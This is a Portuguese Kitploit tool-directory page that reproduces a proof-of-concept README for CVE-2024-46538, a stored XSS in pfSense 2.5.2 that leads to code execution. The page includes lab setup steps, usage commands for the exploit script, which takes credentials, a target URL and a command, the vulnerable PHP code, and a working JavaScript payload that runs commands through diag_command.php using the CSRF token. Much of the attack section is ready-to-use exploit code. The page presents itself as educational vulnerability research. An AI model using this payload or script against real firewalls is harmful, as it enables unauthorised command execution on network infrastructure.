Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-46538 — Exploit de XSS armazenado no PfSense que leva à execução arbitrária de código | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2024-46538
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubeqstlab/cve-2024-46538

CVE-2024-46538

Exploit de XSS armazenado no PfSense que leva à execução arbitrária de código

Ver Repositório
518há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Este post é um artigo de pesquisa publicado por EQSTLab.

Agradecimentos a physicszq, que descobriu esta vulnerabilidade.

CVE-2024-46538

★ CVE-2024-46538 PfSense XSS Armazenado leva à Execução Arbitrária de Código PoC ★

https://github.com/user-attachments/assets/f41d0945-b7f4-4f88-bac5-265904256aae

Descrição

CVE-2024-46538 : Vulnerabilidade de XSS Armazenado no PfSense

descrição: Uma vulnerabilidade de cross-site scripting (XSS) no pfsense v2.5.2 permite que atacantes executem scripts web ou HTML arbitrários através de um payload malicioso injetado na variável $pconfig em interfaces_groups_edit.php.

Configuração do Laboratório

Baixe a versão vulnerável (v2.5.2):

Configurar Máquina Virtual

Executando no Oracle Virtual Box

1. Criar Máquina Virtual descrição

2. Configurar Adaptador 1,2 como: descrição descrição

3. Configurar ordem de boot como: descrição

4. Siga as instruções: descrição descrição descrição descrição descrição descrição descrição

Como usar

Clonar repositório

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-46538.git
cd CVE-2024-46538

Instalar pacotes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
# Store malicious JavaScript payload (No custom js server)
python3 CVE-2024-46538.py -i <USER_ID> -p <USER_PASSWORD> -u <URL_TO_EXPLOIT> -c <CMD_TO_EXECUTE>
# Store malicious JavaScript payload (Use custom js server)
python3 CVE-2024-46538.py -j <CUSTOM_JAVASCRIPT_SERVER> -i <USER_ID> -p <USER_PASSWORD> -u <URL_TO_EXPLOIT> -c <CMD_TO_EXECUTE>

Saída

CVE-2024-46538.py descrição

Análise

/src/usr/local/www/interfaces_groups_edit.php

root@kitploit:~
if (isset($_POST['members'])) {
		$members = implode(" ", $_POST['members']);
	} else {
		$members = "";
	}
...
		// Create new group
		} else {
			$ifgroupentry['ifname'] = $_POST['ifname'];
			$a_ifgroups[] = $ifgroupentry;
		}

		write_config("Interface Group added");
		interface_group_setup($ifgroupentry);

		header("Location: interfaces_groups.php");
		exit;
	} else {
		$pconfig['descr'] = $_POST['descr'];
		$pconfig['members'] = $members;
	}
}

A falta de filtragem na variável $pconfig em interfaces_groups_edit.php leva a uma vulnerabilidade de cross-site scripting (XSS). A vulnerabilidade de cross-site scripting (XSS) permite que atacantes usem o endpoint diag_command.php para executar comandos arbitrários contra um administrador. Por exemplo, o seguinte JavaScript pode levar à execução arbitrária de código.

mal.js

root@kitploit:~
var formData = new FormData();formData.append("__csrf_magic", csrfMagicToken);formData.append("txtCommand", "id");formData.append("txtRecallBuffer", "id");formData.append("submit", "EXEC");formData.append("dlPath", "");formData.append("ulfile", new Blob(), "");formData.append("txtPHPCommand", "");fetch("https://192.168.102.61/diag_command.php", {method: "POST",body: formData}).then(response => response.text()).then(data => {const parser = new DOMParser();const doc = parser.parseFromString(data, "text/html");const contentDiv = doc.querySelector("div.content");if (contentDiv) {alert(contentDiv.textContent);} else {alert("No content found");}})

Cenário

Usuário (Com Privilégio: WebCfg - Interfaces: Groups: Edit) --(Armazena Código JavaScript Malicioso)--> Admin (Com Privilégio para executar código) --(Lê interfaces_groups.php)--> Código JavaScript Executa --> Execução de Código

Aviso Legal

Este repositório não se destina a ser um exploit de XSS para CVE-2024-46538. O objetivo deste projeto é ajudar as pessoas a aprender sobre esta vulnerabilidade e, talvez, testar suas próprias aplicações.

Referências

https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md

https://skshieldus.com/eng/business/insight.do

Baixar ferramenta